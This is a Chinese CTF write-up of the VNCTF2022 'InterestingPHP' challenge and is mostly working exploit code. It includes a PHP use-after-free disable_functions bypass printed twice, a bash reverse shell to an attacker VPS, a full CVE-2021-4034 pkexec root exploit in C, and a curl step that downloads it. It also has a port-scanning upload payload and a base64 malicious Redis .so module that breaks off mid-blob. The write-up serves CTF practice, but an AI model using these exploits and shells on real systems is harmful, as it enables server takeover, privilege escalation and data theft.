VNCTF&36D杯部分复现
VNCTF2022
InterestingPHP
进入题目,一句话木马
phpinfo没回显
应该是禁用了很多函数,利用其他方式来读取配置信息
var_dump(get_cfg_var("disable_functions"));
var_dump(get_cfg_var("open_basedir"));
var_dump(ini_get_all()); //获取所有配置信息
使用scandir扫描目录,发现secret.rdb,是redis的数据文件
所以此题有两种解法
解法一(bypass绕过)
github上by_pass脚本绕过disbale_function
<?php
pwn('uname -a'); //这里填要执行的命令
function pwn($cmd) {
define('LOGGING', false);
define('CHUNK_DATA_SIZE', 0x60);
define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
define('CMD', $cmd);
for($i = 0; $i < 10; $i++) {
$groom[] = Pwn::alloc(STRING_SIZE);
}
stream_filter_register('pwn_filter', 'Pwn');
$fd = fopen('php://memory', 'w');
stream_filter_append($fd,'pwn_filter');
fwrite($fd, 'x');
}
class Helper { public $a, $b, $c; }
class Pwn extends php_user_filter {
private $abc, $abc_addr;
private $helper, $helper_addr, $helper_off;
private $uafp, $hfp;
public function filter($in, $out, &$consumed, $closing) {
if($closing) return;
stream_bucket_make_writeable($in);
$this->filtername = Pwn::alloc(STRING_SIZE);
fclose($this->stream);
$this->go();
return PSFS_PASS_ON;
}
private function go() {
$this->abc = &$this->filtername;
$this->make_uaf_obj();
$this->helper = new Helper;
$this->helper->b = function($x) {};
$this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
$this->log("helper @ 0x%x", $this->helper_addr);
$this->abc_addr = $this->helper_addr - CHUNK_SIZE;
$this->log("abc @ 0x%x", $this->abc_addr);
$this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;
$helper_handlers = $this->str2ptr(CHUNK_SIZE);
$this->log("helper handlers @ 0x%x", $helper_handlers);
$this->prepare_leaker();
$binary_leak = $this->read($helper_handlers + 8);
$this->log("binary leak @ 0x%x", $binary_leak);
$this->prepare_cleanup($binary_leak);
$closure_addr = $this->str2ptr($this->helper_off + 0x38);
$this->log("real closure @ 0x%x", $closure_addr);
$closure_ce = $this->read($closure_addr + 0x10);
$this->log("closure class_entry @ 0x%x", $closure_ce);
$basic_funcs = $this->get_basic_funcs($closure_ce);
$this->log("basic_functions @ 0x%x", $basic_funcs);
$zif_system = $this->get_system($basic_funcs);
$this->log("zif_system @ 0x%x", $zif_system);
$fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
for($i = 0; $i < 0x138; $i += 8) {
$this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
}
$this->write($fake_closure_off + 0x38, 1, 4);
$handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
$this->write($fake_closure_off + $handler_offset, $zif_system);
$fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
$this->write($this->helper_off + 0x38, $fake_closure_addr);
$this->log("fake closure @ 0x%x", $fake_closure_addr);
$this->cleanup();
($this->helper->b)(CMD);
}
private function make_uaf_obj() {
$this->uafp = fopen('php://memory', 'w');
fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
for($i = 0; $i < STRING_SIZE; $i++) {
fwrite($this->uafp, "\x00");
}
}
private function prepare_leaker() {
$str_off = $this->helper_off + CHUNK_SIZE + 8;
$this->write($str_off, 2);
$this->write($str_off + 0x10, 6);
$val_off = $this->helper_off + 0x48;
$this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
$this->write($val_off + 8, 0xA);
}
private function prepare_cleanup($binary_leak) {
$ret_gadget = $binary_leak;
do {
--$ret_gadget;
} while($this->read($ret_gadget, 1) !== 0xC3);
$this->log("ret gadget = 0x%x", $ret_gadget);
$this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
$this->write(8, $ret_gadget);
}
private function read($addr, $n = 8) {
$this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
$value = strlen($this->helper->c);
if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
return $value;
}
private function write($p, $v, $n = 8) {
for($i = 0; $i < $n; $i++) {
$this->abc[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
private function get_basic_funcs($addr) {
while(true) {
// In rare instances the standard module might lie after the addr we're starting
// the search from. This will result in a SIGSGV when the search reaches an unmapped page.
// In that case, changing the direction of the search should fix the crash.
// $addr += 0x10;
$addr -= 0x10;
if($this->read($addr, 4) === 0xA8 &&
in_array($this->read($addr + 4, 4),
[20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
$module_name_addr = $this->read($addr + 0x20);
$module_name = $this->read($module_name_addr);
if($module_name === 0x647261646e617473) {
$this->log("standard module @ 0x%x", $addr);
return $this->read($addr + 0x28);
}
}
}
}
private function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = $this->read($addr);
$f_name = $this->read($f_entry, 6);
if($f_name === 0x6d6574737973) {
return $this->read($addr + 8);
}
$addr += 0x20;
} while($f_entry !== 0);
}
private function cleanup() {
$this->hfp = fopen('php://memory', 'w');
fwrite($this->hfp, pack('QQ', 0, $this->abc_addr));
for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
fwrite($this->hfp, "\x00");
}
}
private function str2ptr($p = 0, $n = 8) {
$address = 0;
for($j = $n - 1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($this->abc[$p + $j]);
}
return $address;
}
private function ptr2str($ptr, $n = 8) {
$out = '';
for ($i = 0; $i < $n; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
private function log($format, $val = '') {
if(LOGGING) {
printf("{$format}\n", $val);
}
}
static function alloc($size) {
return str_shuffle(str_repeat('A', $size));
}
}
因为fwrite 被ban了,所以用fputs替代
pwn('whoami');
function pwn($cmd) {
define('LOGGING', false);
define('CHUNK_DATA_SIZE', 0x60);
define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
define('CMD', $cmd);
for($i = 0; $i < 10; $i++) {
$groom[] = Pwn::alloc(STRING_SIZE);
}
stream_filter_register('pwn_filter', 'Pwn');
$fd = fopen('php://memory', 'w');
stream_filter_append($fd,'pwn_filter');
fputs($fd, 'x');
}
class Helper { public $a, $b, $c; }
class Pwn extends php_user_filter {
private $abc, $abc_addr;
private $helper, $helper_addr, $helper_off;
private $uafp, $hfp;
public function filter($in, $out, &$consumed, $closing) {
if($closing) return;
stream_bucket_make_writeable($in);
$this->filtername = Pwn::alloc(STRING_SIZE);
fclose($this->stream);
$this->go();
return PSFS_PASS_ON;
}
private function go() {
$this->abc = &$this->filtername;
$this->make_uaf_obj();
$this->helper = new Helper;
$this->helper->b = function($x) {};
$this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
$this->log("helper @ 0x%x", $this->helper_addr);
$this->abc_addr = $this->helper_addr - CHUNK_SIZE;
$this->log("abc @ 0x%x", $this->abc_addr);
$this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;
$helper_handlers = $this->str2ptr(CHUNK_SIZE);
$this->log("helper handlers @ 0x%x", $helper_handlers);
$this->prepare_leaker();
$binary_leak = $this->read($helper_handlers + 8);
$this->log("binary leak @ 0x%x", $binary_leak);
$this->prepare_cleanup($binary_leak);
$closure_addr = $this->str2ptr($this->helper_off + 0x38);
$this->log("real closure @ 0x%x", $closure_addr);
$closure_ce = $this->read($closure_addr + 0x10);
$this->log("closure class_entry @ 0x%x", $closure_ce);
$basic_funcs = $this->get_basic_funcs($closure_ce);
$this->log("basic_functions @ 0x%x", $basic_funcs);
$zif_system = $this->get_system($basic_funcs);
$this->log("zif_system @ 0x%x", $zif_system);
$fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
for($i = 0; $i < 0x138; $i += 8) {
$this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
}
$this->write($fake_closure_off + 0x38, 1, 4);
$handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
$this->write($fake_closure_off + $handler_offset, $zif_system);
$fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
$this->write($this->helper_off + 0x38, $fake_closure_addr);
$this->log("fake closure @ 0x%x", $fake_closure_addr);
$this->cleanup();
($this->helper->b)(CMD);
}
private function make_uaf_obj() {
$this->uafp = fopen('php://memory', 'w');
fputs($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
for($i = 0; $i < STRING_SIZE; $i++) {
fputs($this->uafp, "\x00");
}
}
private function prepare_leaker() {
$str_off = $this->helper_off + CHUNK_SIZE + 8;
$this->write($str_off, 2);
$this->write($str_off + 0x10, 6);
$val_off = $this->helper_off + 0x48;
$this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
$this->write($val_off + 8, 0xA);
}
private function prepare_cleanup($binary_leak) {
$ret_gadget = $binary_leak;
do {
--$ret_gadget;
} while($this->read($ret_gadget, 1) !== 0xC3);
$this->log("ret gadget = 0x%x", $ret_gadget);
$this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
$this->write(8, $ret_gadget);
}
private function read($addr, $n = 8) {
$this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
$value = strlen($this->helper->c);
if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
return $value;
}
private function write($p, $v, $n = 8) {
for($i = 0; $i < $n; $i++) {
$this->abc[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
private function get_basic_funcs($addr) {
while(true) {
// In rare instances the standard module might lie after the addr we're starting
// the search from. This will result in a SIGSGV when the search reaches an unmapped page.
// In that case, changing the direction of the search should fix the crash.
// $addr += 0x10;
$addr -= 0x10;
if($this->read($addr, 4) === 0xA8 &&
in_array($this->read($addr + 4, 4),
[20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
$module_name_addr = $this->read($addr + 0x20);
$module_name = $this->read($module_name_addr);
if($module_name === 0x647261646e617473) {
$this->log("standard module @ 0x%x", $addr);
return $this->read($addr + 0x28);
}
}
}
}
private function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = $this->read($addr);
$f_name = $this->read($f_entry, 6);
if($f_name === 0x6d6574737973) {
return $this->read($addr + 8);
}
$addr += 0x20;
} while($f_entry !== 0);
}
private function cleanup() {
$this->hfp = fopen('php://memory', 'w');
fputs($this->hfp, pack('QQ', 0, $this->abc_addr));
for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
fputs($this->hfp, "\x00");
}
}
private function str2ptr($p = 0, $n = 8) {
$address = 0;
for($j = $n - 1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($this->abc[$p + $j]);
}
return $address;
}
private function ptr2str($ptr, $n = 8) {
$out = '';
for ($i = 0; $i < $n; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
private function log($format, $val = '') {
if(LOGGING) {
printf("{$format}\n", $val);
}
}
static function alloc($size) {
return str_shuffle(str_repeat('A', $size));
}
}
上传时注意几点
1.选择multipart/form-data
2.——WebKitFormBoundary 最后面的——要去掉
3.添加 Content-Disposition: form-data; name=”构造的shell参数名”
4.去掉<?php
拿flag权限不够
反弹shell
bash -c 'exec bash -i &>/dev/tcp/your VPSIP/PORT <&1'
发现权限不够,用pkexec提权,CVE-2021-4034
POC
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
void fatal(char *f) {
perror(f);
exit(-1);
}
void compile_so() {
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}
char so_code[]=
"#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";
fwrite(so_code, strlen(so_code), 1, f);
fclose(f);
system("gcc -o payload.so -shared -fPIC payload.c");
}
int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
"GIO_USE_VFS=",
NULL
};
printf("[~] compile helper..\n");
compile_so();
if (stat("GCONV_PATH=.", &st) < 0) {
if(mkdir("GCONV_PATH=.", 0777) < 0) {
fatal("mkdir");
}
int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777);
if (fd < 0) {
fatal("open");
}
close(fd);
}
if (stat("lol", &st) < 0) {
if(mkdir("lol", 0777) < 0) {
fatal("mkdir");
}
FILE *fp = fopen("lol/gconv-modules", "wb");
if(fp == NULL) {
fatal("fopen");
}
fprintf(fp, "module UTF-8// INTERNAL ../payload 2\n");
fclose(fp);
}
printf("[~] maybe get shell now?\n");
execve("/usr/bin/pkexec", a_argv, a_envp);
}
curl http://xxx/shell.c > /tmp/poc.c #通过curl下载到/tmp目录下,只有tmp目录才有权限进行文件写入
cd /tmp
gcc poc.c -o poc #编译为可执行文件
./poc
提权成功,拿到flag
解法二(redis加载恶意.so文件)
前面扫目录的时候发现了redis文件
secret.rdb
REDIS0008� redis-ver4.0.9�
redis-bits�@�ctime³��a�used-mem€� �aof-preamble� � � sercetye_w4nt_a_gir1fri3nd��nR�K��S
所以密码应该为ye_w4nt_a_gir1fri3nd
redis默认端口为6379,结果发现并不是,所以需要扫描端口
<?php
highlight_file(__FILE__);
for($i=0;$i<65535;$i++) {
$t=stream_socket_server("tcp://0.0.0.0:".$i,$ee,$ee2);
if($ee2 === "Address already in use") {
var_dump($i);
}
}
利用file_put_contents上传脚本,需要base64一下
/GET
?exp=file_put_contents('shell.php',base64_decode($_POST['shell']));
/POST
shell=PD9waHAKaGlnaGxpZ2h0X2ZpbGUoX19GSUxFX18pOwpmb3IoJGk9MDskaTw2NTUzNTskaSsrKSB7CiAgJHQ9c3RyZWFtX3NvY2tldF9zZXJ2ZXIoInRjcDovLzAuMC4wLjA6Ii4kaSwkZWUsJGVlMik7CiAgaWYoJGVlMiA9PT0gIkFkZHJlc3MgYWxyZWFkeSBpbiB1c2UiKSB7CiAgICB2YXJfZHVtcCgkaSk7CiAgfQp9
找到redis端口8888
先利用file_put_contents上传恶意so文件
?exp=file_put_contents('shell.so',base64_decode($_POST['shell']));
需要先将so文件进行base64编码
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAgCgAAAAAAABAAAAAAAAAACCnAAAAAAAAAAAAAEAAOAAFAEAAGAAXAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHEgAAAAAAAAcSAAAAAAAAAAAIAAAAAAAAQAAAAYAAACgTgAAAAAAAKBOIAAAAAAAoE4gAAAAAADwAQAAAAAAANAFAAAAAAAAAAAgAAAAAAACAAAABgAAAKBOAAAAAAAAoE4gAAAAAACgTiAAAAAAAGABAAAAAAAAYAEAAAAAAAAIAAAAAAAAAFHldGQGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAUuV0ZAQAAACgTgAAAAAAAKBOIAAAAAAAoE4gAAAAAABgAQAAAAAAAGABAAAAAAAAAQAAAAAAAACDAAAAkgAAAAAAAAA0AAAAAAAAAFYAAAB1AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAB0AAACDAAAAAAAAAAAAAAAJAAAANQAAAEUAAAAxAAAAEQAAAA0AAAAeAAAAcAAAAAAAAAABAAAAAAAAABQAAABkAAAAAAAAAAUAAAAfAAAAAAAAABgAAAAlAAAAAAAAAAAAAAAKAAAAAAAAAGsAAAAOAAAAPwAAAEAAAACPAAAAAAAAAGgAAAB8AAAAAAAAAEEAAABDAAAAAAAAAJAAAABCAAAAXwAAAEYAAAAAAAAAAAAAAH4AAAAAAAAAbwAAAAsAAAAAAAAAJwAAADcAAAAAAAAAAAAAAIgAAAAqAAAAjQAAAAAAAAA4AAAAPQAAADkAAAAAAAAAhgAAAAAAAABSAAAAkQAAABYAAABbAAAAXQAAAFgAAAA6AAAAAAAAAFEAAAAAAAAAPgAAAEQAAAAAAAAABwAAAAAAAAAAAAAALAAAABkAAAAuAAAAAgAAAAAAAABjAAAAiQAAAAAAAACLAAAAgAAAAFUAAABmAAAAagAAAAAAAABXAAAAhwAAAIEAAAASAAAAAAAAAAAAAAAyAAAASwAAACMAAABlAAAAAAAAAIQAAAAPAAAAewAAAGcAAAB2AAAAXgAAABwAAAAGAAAAOwAAAIUAAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWQAAAAAAAAAAAAAAcwAAAGEAAAAAAAAAVAAAABAAAABpAAAARwAAAAAAAABMAAAAAAAAAAAAAAAAAAAAAAAAAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAAAAAFMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG0AAAAAAAAAAAAAAAAAAAAAAAAAcgAAABoAAAAAAAAAAAAAAFoAAABPAAAAKQAAAGIAAAAzAAAAMAAAAAAAAAAtAAAAAAAAAEoAAAAmAAAAAAAAABUAAAAAAAAAcQAAAAAAAAB0AAAATgAAAAAAAAAAAAAAjgAAAAAAAABuAAAAJAAAAAAAAAAAAAAAKwAAAEkAAAAMAAAAAAAAAAAAAAAhAAAAAAAAAH0AAAAAAAAAggAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFwAAADYAAAAAAAAAigAAAHkAAAAAAAAAKAAAAAAAAAAAAAAAAAAAABMAAAAEAAAAGwAAAAAAAAB%2FAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAdwAAAAAAAAADAAAAAAAAAAAAAAAAAAAATQAAAAAAAAB6AAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiAAAAAAAAAFwAAAAAAAAAAAAAAHgAAAAAAAAAYQAAABAAAAAQAAAACgAAAKBIAYAEUJCQyIABEI4QgAAQACQACIYJABCMggQgBxQAMAyIYAwtQKEJABJAyQwIAECgI1AQAkUGAIiEMQMUSgQOIAIIAYIAGYAYMpny4CQAaRRQvBAEAkMQACiMKRiAEAERghAIQAIAqAWNqIMzEAiQBCAKEEq6D0EANaQAADAgEAAAABIAAAAUAAAAFwAAABkAAAAbAAAAAAAAAAAAAAAdAAAAIAAAAAAAAAAhAAAAIwAAACQAAAAmAAAAJwAAACgAAAAqAAAALAAAAAAAAAAtAAAALwAAADAAAAAyAAAAMwAAAAAAAAA0AAAANQAAADYAAAA4AAAAOgAAADsAAAA8AAAAPgAAAAAAAABAAAAAQQAAAEIAAABDAAAARAAAAEYAAABHAAAASQAAAEwAAAAAAAAAUAAAAFIAAABWAAAAAAAAAFgAAABZAAAAWgAAAFsAAABcAAAAXgAAAAAAAABfAAAAYAAAAAAAAABhAAAAYgAAAGgAAABpAAAAagAAAAAAAABrAAAAAAAAAG0AAABuAAAAcAAAAHEAAAByAAAAdAAAAHcAAAAAAAAAeAAAAHkAAAB7AAAAAAAAAH0AAAB%2BAAAAfwAAAAAAAAAAAAAAgAAAAIIAAACDAAAAhAAAAAAAAACHAAAAiAAAAIsAAACOAAAAkAAAAJEAAAAAAAAAAAAAAGy%2BKEaB4qkFZgxPJz%2FQZyPQV53vrseSTF23odFyYoXrS0OOU%2BBqniWfwThxHKnkoKtUdV5kcuVRsqRuSuFd%2FA7PLJ71Pk3jMZvXmPJlho5TYkCYhimJg9iDUiisSw%2Bwtvot5XOXMgG%2FBIgztv0bXJYrFdJIIqELwPt13ybppIWfRlZCX8WO%2BQ43uLuV7UlCIlsXTNLdU5aGONll87dXrv9kfu%2BYCY8NI0NF1ewLKTmzqCtC6Y3Jj5QogomBYZ8m1K%2BMI7xn1s8%2BtZNn1tVuWkUsfMz810TZSGGd4K6QGdmTu1WdNjZAEoTKEMdjsZJgadp%2BcSeGam%2FybKdCWZ1FF0e6E2jC5WhW7vaphGqqKih8UJ4VNm0cypjA12ekc3ncJtlxWBzPzXqF9agw%2BNt%2FbE5qAew7FxFJ77vjknwP8E4CR%2B%2B52l2ED9AG0ObG8tDlUWJRcXgaDiHlquc7V6WlRbsBc0Uam34bj0uafXEACgVVh8%2Fen2eptXVi3PoOhebYk1fTxVu%2FclKiRjyU6oVIiosQ8ixM7K5t7p0OqPBTo3x7%2FZYO8%2FRL%2FA6zPdXBPBH0DguI%2FSKHZyvu8YWogDviG9YAvvdZ8XWqfx%2B1IBhDI73FFjPu%2FRC7M7axzNFIuUFmQlJ%2FVfcMgoY3297te25uzma62diTW4Mpk0xS2abT8lUjEcfdJmm39Q4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdAwAABIAAAAAAAAAAAAAAAAAAAAAAAAAlwwAABIAAAAAAAAAAAAAAAAAAAAAAAAAxwwAABIAAAAAAAAAAAAAAAAAAAAAAAAA3AwAABIAAAAAAAAAAAAAAAAAAAAAAAAAkAwAABIAAAAAAAAAAAAAAAAAAAAAAAAAigwAABIAAAAAAAAAAAAAAAAAAAAAAAAA4QwAABIAAAAAAAAAAAAAAAAAAAAAAAAAvQwAABIAAAAAAAAAAAAAAAAAAAAAAAAAbQwAABIAAAAAAAAAAAAAAAAAAAAAAAAAewwAABIAAAAAAAAAAAAAAAAAAAAAAAAAZwwAABIAAAAAAAAAAAAAAAAAAAAAAAAAuAwAABIAAAAAAAAAAAAAAAAAAAAAAAAAgwwAABIAAAAAAAAAAAAAAAAAAAAAAAAA1AwAABIAAAAAAAAAAAAAAAAAAAAAAAAAzQwAABIAAAAAAAAAAAAAAAAAAAAAAAAADQgAABEADgDwUCAAAAAAAAgAAAAAAAAAPQsAABEADgAIUSAAAAAAAAgAAAAAAAAA2QkAABEADgAwUiAAAAAAAAgAAAAAAAAAwwIAABEADgAYUyAAAAAAAAgAAAAAAAAA%2BgAAABEADgBgUiAAAAAAAAgAAAAAAAAAWAUAABEADgCYUiAAAAAAAAgAAAAAAAAA5QQAABEADgBoUyAAAAAAAAgAAAAAAAAAvAkAABEADgCwUCAAAAAAAAgAAAAAAAAAJwUAABEADgAoUiAAAAAAAAgAAAAAAAAAPQEAABEADgDQUyAAAAAAAAgAAAAAAAAAJggAABEADgAAVCAAAAAAAAgAAAAAAAAAuAEAABEADgDIUCAAAAAAAAgAAAAAAAAAPwgAABEADgAYVCAAAAAAAAgAAAAAAAAAUwkAABEADgDIUiAAAAAAAAgAAAAAAAAAVQQAABEADgBYUyAAAAAAAAgAAAAAAAAAfAoAABEADgD4UyAAAAAAAAgAAAAAAAAA8wUAABEADgAAUyAAAAAAAAgAAAAAAAAAogkAABEADgAoUSAAAAAAAAgAAAAAAAAAVggAABEADgAAUiAAAAAAAAgAAAAAAAAAEQUAABEADgCAUiAAAAAAAAgAAAAAAAAAJwAAABEADgAgUSAAAAAAAAgAAAAAAAAAVgYAABEADgDoUSAAAAAAAAgAAAAAAAAASwAAABEADgCoUCAAAAAAAAgAAAAAAAAAagkAABEADgDwUiAAAAAAAAgAAAAAAAAAbAQAABEADgDoUCAAAAAAAAgAAAAAAAAAOgQAABEADgBAUSAAAAAAAAgAAAAAAAAAAQcAABEADgDQUSAAAAAAAAgAAAAAAAAAfgEAABEADgAgUiAAAAAAAAgAAAAAAAAAxQUAABEADgCYUSAAAAAAAAgAAAAAAAAAEwAAABEADgCoUSAAAAAAAAgAAAAAAAAA2QUAABEADgAYUiAAAAAAAAgAAAAAAAAAvwQAABEADgDgUCAAAAAAAAgAAAAAAAAAgQgAABEADgCQUyAAAAAAAAgAAAAAAAAAAgwAABEADgAIVCAAAAAAAAgAAAAAAAAAxQAAABEADgBoUiAAAAAAAAgAAAAAAAAAiwAAABEADgCAUSAAAAAAAAgAAAAAAAAA8gkAABEADgCgUiAAAAAAAAgAAAAAAAAApwEAABEADgBoVCAAAAAAAAgAAAAAAAAAtQgAABEADgCIUSAAAAAAAAgAAAAAAAAAoAIAABEADgDAUSAAAAAAAAgAAAAAAAAApgoAABEADgCAUyAAAAAAAAgAAAAAAAAATwMAABEADgDoUyAAAAAAAAgAAAAAAAAABQ0AABAADQCQUCAAAAAAAAAAAAAAAAAAJAIAABEADgAoVCAAAAAAAAgAAAAAAAAA3AAAABEADgBwUSAAAAAAAAgAAAAAAAAA%2BQIAABEADgBQVCAAAAAAAAgAAAAAAAAAqAwAABIACQCDOAAAAAAAADsBAAAAAAAAdQYAABEADgDgUyAAAAAAAAgAAAAAAAAALAwAABEADgBIUyAAAAAAAAgAAAAAAAAA7gcAABEADgBAUyAAAAAAAAgAAAAAAAAAcQAAABEADgBwUyAAAAAAAAgAAAAAAAAAegsAABEADgC4UCAAAAAAAAgAAAAAAAAAkwEAABEADgC4UiAAAAAAAAgAAAAAAAAABwIAABEADgCIUyAAAAAAAAgAAAAAAAAArAMAABEADgDYUiAAAAAAAAgAAAAAAAAAvwoAABEADgCgUSAAAAAAAAgAAAAAAAAA4gIAABEADgAwVCAAAAAAAAgAAAAAAAAAXQwAABIACQAJNwAAAAAAAHoBAAAAAAAALQMAABEADgCQUSAAAAAAAAgAAAAAAAAAlgcAABEADgCwUSAAAAAAAAgAAAAAAAAAagMAABEADgCQUCAAAAAAAAgAAAAAAAAAFwkAABEADgDQUCAAAAAAAAgAAAAAAAAAAQAAABEADgBQUiAAAAAAAAgAAAAAAAAANgYAABEADgCoUiAAAAAAAAgAAAAAAAAAbgUAABEADgCoUyAAAAAAAAgAAAAAAAAA7AsAABEADgDwUyAAAAAAAAgAAAAAAAAAoAQAABEADgBQUSAAAAAAAAgAAAAAAAAAFAoAABEADgBgUSAAAAAAAAgAAAAAAAAAMgoAABEADgDQUiAAAAAAAAgAAAAAAAAAYgIAABEADgBIVCAAAAAAAAgAAAAAAAAAewIAABEADgD4UiAAAAAAAAgAAAAAAAAAmQYAABEADgBAVCAAAAAAAAgAAAAAAAAADA0AABAADgCQUCAAAAAAAAAAAAAAAAAAOAAAABEADgBYUSAAAAAAAAgAAAAAAAAAggQAABEADgA4USAAAAAAAAgAAAAAAAAAigMAABEADgDIUSAAAAAAAAgAAAAAAAAA6QgAABEADgCYUCAAAAAAAAgAAAAAAAAAzQYAABEADgB4UyAAAAAAAAgAAAAAAAAAGA0AABAADgBwVCAAAAAAAAAAAAAAAAAAtwsAABEADgDAUyAAAAAAAAgAAAAAAAAAqAAAABEADgDAUCAAAAAAAAgAAAAAAAAAAAkAABEADgAQUiAAAAAAAAgAAAAAAAAAFAEAABEADgB4USAAAAAAAAgAAAAAAAAAsQcAABEADgDgUSAAAAAAAAgAAAAAAAAAQwkAABEADgAIUyAAAAAAAAgAAAAAAAAA%2BwQAABEADgA4UyAAAAAAAAgAAAAAAAAA0AcAABEADgDIUyAAAAAAAAgAAAAAAAAAyAMAABEADgBgVCAAAAAAAAgAAAAAAAAAZgEAABEADgBAUiAAAAAAAAgAAAAAAAAAXgAAABEADgAQUyAAAAAAAAgAAAAAAAAA7QEAABEADgAwUSAAAAAAAAgAAAAAAAAAmAgAABEADgDYUCAAAAAAAAgAAAAAAAAAZwoAABEADgCQUiAAAAAAAAgAAAAAAAAAgAcAABEADgC4USAAAAAAAAgAAAAAAAAAFwwAABEADgAYUSAAAAAAAAgAAAAAAAAAAAsAABEADgBoUSAAAAAAAAgAAAAAAAAALQkAABEADgAgVCAAAAAAAAgAAAAAAAAA6AwAABIACQC%2BOQAAAAAAANQAAAAAAAAAbQgAABEADgAQUSAAAAAAAAgAAAAAAAAA4gMAABEADgCIUiAAAAAAAAgAAAAAAAAAlwsAABEADgB4UiAAAAAAAAgAAAAAAAAARQwAABEADgDgUiAAAAAAAAgAAAAAAAAAXAsAABEADgAwUyAAAAAAAAgAAAAAAAAAZAcAABEADgBIUiAAAAAAAAgAAAAAAAAAKQEAABEADgA4UiAAAAAAAAgAAAAAAAAAkQoAABEADgCgUCAAAAAAAAgAAAAAAAAAzAgAABEADgAIUiAAAAAAAAgAAAAAAAAAFAsAABEADgBYUiAAAAAAAAgAAAAAAAAA0wEAABEADgC4UyAAAAAAAAgAAAAAAAAA1gsAABEADgCgUyAAAAAAAAgAAAAAAAAANwcAABEADgBQUyAAAAAAAAgAAAAAAAAAHQQAABEADgD4USAAAAAAAAgAAAAAAAAA0woAABEADgAgUyAAAAAAAAgAAAAAAAAA%2FgMAABEADgAQVCAAAAAAAAgAAAAAAAAAPQUAABEADgDAUiAAAAAAAAgAAAAAAAAArwUAABEADgA4VCAAAAAAAAgAAAAAAAAAFQcAABEADgD4UCAAAAAAAAgAAAAAAAAA7QYAABEADgBIUSAAAAAAAAgAAAAAAAAAhAUAABEADgCYUyAAAAAAAAgAAAAAAAAAUAoAABEADgAAUSAAAAAAAAgAAAAAAAAAQAIAABEADgBwUiAAAAAAAAgAAAAAAAAATAcAABEADgCwUiAAAAAAAAgAAAAAAAAAiQkAABEADgDoUiAAAAAAAAgAA